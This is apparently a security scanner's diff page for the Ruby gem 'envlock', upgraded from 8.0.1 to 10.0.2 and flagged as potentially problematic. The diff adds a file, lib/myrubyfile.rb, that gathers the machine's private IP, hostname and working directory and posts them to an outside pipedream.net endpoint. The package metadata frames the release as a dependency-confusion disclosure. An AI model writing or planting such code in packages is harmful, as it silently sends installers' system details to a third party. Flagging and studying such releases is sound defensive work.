envlock 8.0.1 → 10.0.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of envlock might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/lib/myrubyfile.rb +26 -0
- metadata +15 -13
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 670eecd37d04ec0031ccf6adc49ff94da708f9b8990cef58b9a49c5504c9f64f
|
4
|
+
data.tar.gz: b26253d35ad1ad97e41c3bc9e8df7ecbbc19f36456661a173eeedd44f57612f5
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: d267f286b73552d1354adf2758948af3fb9aaff1df4bc36f0fa447d118d60493fd43c8b6443cc96ac59d39b3309d63fd614ff0e84ade4c82bbc9b2c9f5c704ed
|
7
|
+
data.tar.gz: b6f3c2a50501fb7f0db198390d144cfea8b8c4d8aa727b2b17a622083b0d1bcae2200efeb40dbd322fa9b125e20392a9b9567b082d19905bd517ead9e451d3bb
|
data/lib/myrubyfile.rb
ADDED
@@ -0,0 +1,26 @@
|
|
1
|
+
require 'json'
|
2
|
+
require 'net/http'
|
3
|
+
require 'socket'
|
4
|
+
|
5
|
+
#Private IP
|
6
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1);
|
7
|
+
s.addr.last}
|
8
|
+
#Hostname
|
9
|
+
hostname = Socket.gethostname
|
10
|
+
#Current directory
|
11
|
+
dir = Dir.pwd
|
12
|
+
|
13
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
14
|
+
uri = URI('https://eox7hb9vmzgf94.m.pipedream.net')
|
15
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
16
|
+
|
17
|
+
req.body = {
|
18
|
+
private_ip: privip,
|
19
|
+
hostname: hostname,
|
20
|
+
current_directory: dir
|
21
|
+
}.to_json
|
22
|
+
|
23
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme ==
|
24
|
+
'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
metadata
CHANGED
@@ -1,26 +1,28 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: envlock
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version:
|
4
|
+
version: 10.0.2
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
|
-
-
|
8
|
-
autorequire:
|
7
|
+
- Naveen kumawat
|
8
|
+
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2023-07-
|
11
|
+
date: 2023-07-14 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
|
-
description:
|
13
|
+
description: This Ruby package vulnerable to dependency confiuse vulnerability
|
14
14
|
email:
|
15
|
-
-
|
15
|
+
- nvkattacker@gmail.com
|
16
16
|
executables: []
|
17
17
|
extensions: []
|
18
18
|
extra_rdoc_files: []
|
19
|
-
files:
|
20
|
-
|
21
|
-
|
19
|
+
files:
|
20
|
+
- lib/myrubyfile.rb
|
21
|
+
homepage: https://rubygems.org/gems/envlock
|
22
|
+
licenses:
|
23
|
+
- MIT
|
22
24
|
metadata: {}
|
23
|
-
post_install_message:
|
25
|
+
post_install_message:
|
24
26
|
rdoc_options: []
|
25
27
|
require_paths:
|
26
28
|
- lib
|
@@ -35,8 +37,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
35
37
|
- !ruby/object:Gem::Version
|
36
38
|
version: '0'
|
37
39
|
requirements: []
|
38
|
-
rubygems_version: 3.
|
39
|
-
signing_key:
|
40
|
+
rubygems_version: 3.4.10
|
41
|
+
signing_key:
|
40
42
|
specification_version: 4
|
41
|
-
summary:
|
43
|
+
summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
|
42
44
|
test_files: []
|